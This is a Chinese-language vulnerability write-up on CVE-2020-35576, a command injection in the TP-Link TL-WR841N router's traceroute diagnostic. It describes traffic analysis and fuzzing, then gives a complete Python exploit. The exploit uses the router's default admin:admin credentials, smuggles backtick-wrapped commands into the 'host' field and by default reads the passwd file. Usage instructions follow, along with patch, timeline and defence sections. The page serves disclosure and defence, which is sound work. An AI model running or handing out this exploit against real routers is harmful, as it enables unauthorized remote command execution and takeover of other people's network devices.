TP-Link TL-WR841N 命令注入漏洞分析与利用(CVE-2020-35576)<\/h1>

漏洞概述<\/h2>

TP-Link TL-WR841N 无线路由器存在一个参数注入漏洞(CVE-2020-35576)，该漏洞允许经过身份验证的远程攻击者在系统上执行任意命令。漏洞存在于路由器的Traceroute诊断功能中，由于对用户输入过滤不严，导致攻击者可以注入恶意命令。<\/p>

受影响版本<\/strong>：<\/p>

TL-WR841N(JP)_V13_161028 <=0.9.1 4.0 v0188.0 Build 161028 Rel.66845n<\/li> <\/ul>
CVSS评分<\/strong>：7.2<\/p>
漏洞发现过程<\/h2>
流量分析<\/h3>
路由器提供多种系统诊断工具，包括Ping和Traceroute功能。通过分析客户端与路由器的交互流量，发现以下关键请求序列：<\/p>

初始化请求<\/strong>：<\/p>
[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0 <\/code><\/pre> 成功返回[error]0<\/code><\/p> <\/li> Traceroute诊断请求<\/strong>：<\/p> [TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8 maxHopCount=20 timeout=50 numberOfTries=1 host=127.0.0.1 dataBlockSize=64 X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested X_TP_HopSeq=0 <\/code><\/pre> <\/li> 结果查询请求<\/strong>：<\/p> [TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3 diagnosticsState X_TP_HopSeq X_TP_Result <\/code><\/pre> <\/li> <\/ol> 漏洞定位<\/h3> 通过模糊测试(Fuzzing)发现host<\/code>参数存在命令注入漏洞。测试表明后台可能使用类似system("command")<\/code>的方式执行Traceroute命令，攻击者可以通过闭合引号注入恶意命令。<\/p> 漏洞利用<\/h2> 利用原理<\/h3> 在host<\/code>参数中注入命令，使用反引号(`)或引号闭合原有命令并执行额外命令：<\/p> host="`payload`" <\/code><\/pre> 完整利用POC<\/h3> import<\/span> requests <\/span><\/span>import<\/span> sys <\/span><\/span>import<\/span> time <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> _ =<\/span> sys.<\/span>argv[2<\/span>] <\/span><\/span> payload =<\/span> ' '<\/span>.<\/span>join(sys.<\/span>argv[1<\/span>:]) <\/span><\/span>except<\/span> IndexError<\/span>: <\/span><\/span> try<\/span>: <\/span><\/span> payload =<\/span> sys.<\/span>argv[1<\/span>] <\/span><\/span> except<\/span> IndexError<\/span>: <\/span><\/span> print("[*] Command not specified, using the default `cat etc\/passwd`"<\/span>) <\/span><\/span> payload =<\/span> 'cat etc\/passwd'<\/span> <\/span><\/span> <\/span><\/span># 默认凭证为admin:admin - 根据实际情况修改<\/span> <\/span><\/span>cookies =<\/span> {'Authorization'<\/span>: 'Basic YWRtaW46YWRtaW4='<\/span>} <\/span><\/span>headers =<\/span> { <\/span><\/span> 'Host'<\/span>: '192.168.0.1'<\/span>, <\/span><\/span> 'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\/20100101 Firefox\/84.0'<\/span>, <\/span><\/span> 'Accept'<\/span>: '*\/*'<\/span>, <\/span><\/span> 'Accept-Language'<\/span>: 'en-US,en;q=0.5'<\/span>, <\/span><\/span> 'Accept-Encoding'<\/span>: 'gzip, deflate'<\/span>, <\/span><\/span> 'Content-Type'<\/span>: 'text\/plain'<\/span>, <\/span><\/span> 'Content-Length'<\/span>: '197'<\/span>, <\/span><\/span> 'Origin'<\/span>: 'http:\/\/192.168.0.1'<\/span>, <\/span><\/span> 'Connection'<\/span>: 'close'<\/span>, <\/span><\/span> 'Referer'<\/span>: 'http:\/\/192.168.0.1\/mainFrame.htm'<\/span>, <\/span><\/span>} <\/span><\/span> <\/span><\/span>data1 =<\/span> '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8<\/span>\r<\/span> <\/span><\/span><\/span>maxHopCount=20<\/span>\r<\/span> <\/span><\/span><\/span>timeout=50<\/span>\r<\/span> <\/span><\/span><\/span>numberOfTries=1<\/span>\r<\/span> <\/span><\/span><\/span>host="`<\/span>{}<\/span>`"<\/span>\r<\/span> <\/span><\/span><\/span>dataBlockSize=64<\/span>\r<\/span> <\/span><\/span><\/span>X_TP_ConnName=ewan_ipoe_d<\/span>\r<\/span> <\/span><\/span><\/span>diagnosticsState=Requested<\/span>\r<\/span> <\/span><\/span><\/span>X_TP_HopSeq=0<\/span>\r<\/span> <\/span><\/span><\/span>'''<\/span>.<\/span>format(payload) <\/span><\/span> <\/span><\/span>response1 =<\/span> requests.<\/span>post('http:\/\/192.168.0.1\/cgi?2'<\/span>, headers=<\/span>headers, cookies=<\/span>cookies, data=<\/span>data1, verify=<\/span>False<\/span>) <\/span><\/span>print('[+] Sending payload...'<\/span>) <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> response1.<\/span>text.<\/span>splitlines()[0<\/span>] <\/span><\/span>except<\/span> IndexError<\/span>: <\/span><\/span> sys.<\/span>exit('[-] Cannot get response. Please check your cookie.'<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> response1.<\/span>text.<\/span>splitlines()[0<\/span>] !=<\/span> '[error]0'<\/span>: <\/span><\/span> sys.<\/span>exit('[*] Router\/Firmware is not vulnerable.'<\/span>) <\/span><\/span> <\/span><\/span>data2 =<\/span> '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0<\/span>\r\n<\/span>'<\/span> <\/span><\/span>response2 =<\/span> requests.<\/span>post('http:\/\/192.168.0.1\/cgi?7'<\/span>, headers=<\/span>headers, cookies=<\/span>cookies, data=<\/span>data2, verify=<\/span>False<\/span>) <\/span><\/span>print('[+] Receiving response from router...'<\/span>) <\/span><\/span> <\/span><\/span>time.<\/span>sleep(0.8<\/span>) # 为traceroute成功提供缓冲时间<\/span> <\/span><\/span> <\/span><\/span>data3 =<\/span> '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3<\/span>\r<\/span> <\/span><\/span><\/span>diagnosticsState<\/span>\r<\/span> <\/span><\/span><\/span>X_TP_HopSeq<\/span>\r<\/span> <\/span><\/span><\/span>X_TP_Result<\/span>\r<\/span> <\/span><\/span><\/span>'''<\/span> <\/span><\/span>response3 =<\/span> requests.<\/span>post('http:\/\/192.168.0.1\/cgi?1'<\/span>, headers=<\/span>headers, cookies=<\/span>cookies, data=<\/span>data3, verify=<\/span>False<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> '=:'<\/span> in<\/span> response3.<\/span>text.<\/span>splitlines()[3<\/span>]: <\/span><\/span> print('[-] Command not supported.'<\/span>) <\/span><\/span>else<\/span>: <\/span><\/span> print('[+] Exploit successful!'<\/span>) <\/span><\/span> for<\/span> line_number, line in<\/span> enumerate(response3.<\/span>text.<\/span>splitlines()): <\/span><\/span> try<\/span>: <\/span><\/span> if<\/span> line_number ==<\/span> 3<\/span>: <\/span><\/span> print(line[12<\/span>:]) <\/span><\/span> if<\/span> line_number ><\/span> 3<\/span> and<\/span> line !=<\/span> '[error]0'<\/span>: <\/span><\/span> print(line) <\/span><\/span> if<\/span> 'not known'<\/span> in<\/span> line: <\/span><\/span> break<\/span> <\/span><\/span> except<\/span> IndexError<\/span>: <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>使用说明<\/h3> 保存上述代码为exploit.py<\/code><\/li> 运行方式： python exploit.py [command] <\/code><\/pre> 例如： python exploit.py "cat \/etc\/passwd" <\/code><\/pre> <\/li> 如果没有指定命令，默认执行cat etc\/passwd<\/code><\/li> <\/ol> 警告<\/strong>：执行破坏性命令(如rm -rf<\/code>)可能导致路由器永久损坏，无法通过重置恢复。<\/p> 漏洞修复<\/h2> 厂商已发布修复固件，建议用户：<\/p> 检查当前固件版本<\/li> 访问TP-Link官方网站下载最新固件<\/li> 按照厂商指导进行固件升级<\/li> <\/ol> 漏洞时间线<\/h2> 报告给Vendor (security@tp-link.com)<\/li> 分配CVE-2020-35576编号<\/li> 向Vendor提供漏洞利用细节<\/li> Vendor提供新固件版本<\/li> 测试确认新固件修复漏洞<\/li> Vendor公开发布修复固件<\/li> <\/ol> 防御建议<\/h2> 及时更新路由器固件<\/li> 修改默认管理员凭证<\/li> 限制路由器管理界面的访问(如仅限内网访问)<\/li> 实施输入验证和过滤，特别是对系统命令的参数<\/li> 使用最小权限原则运行服务<\/li> <\/ol>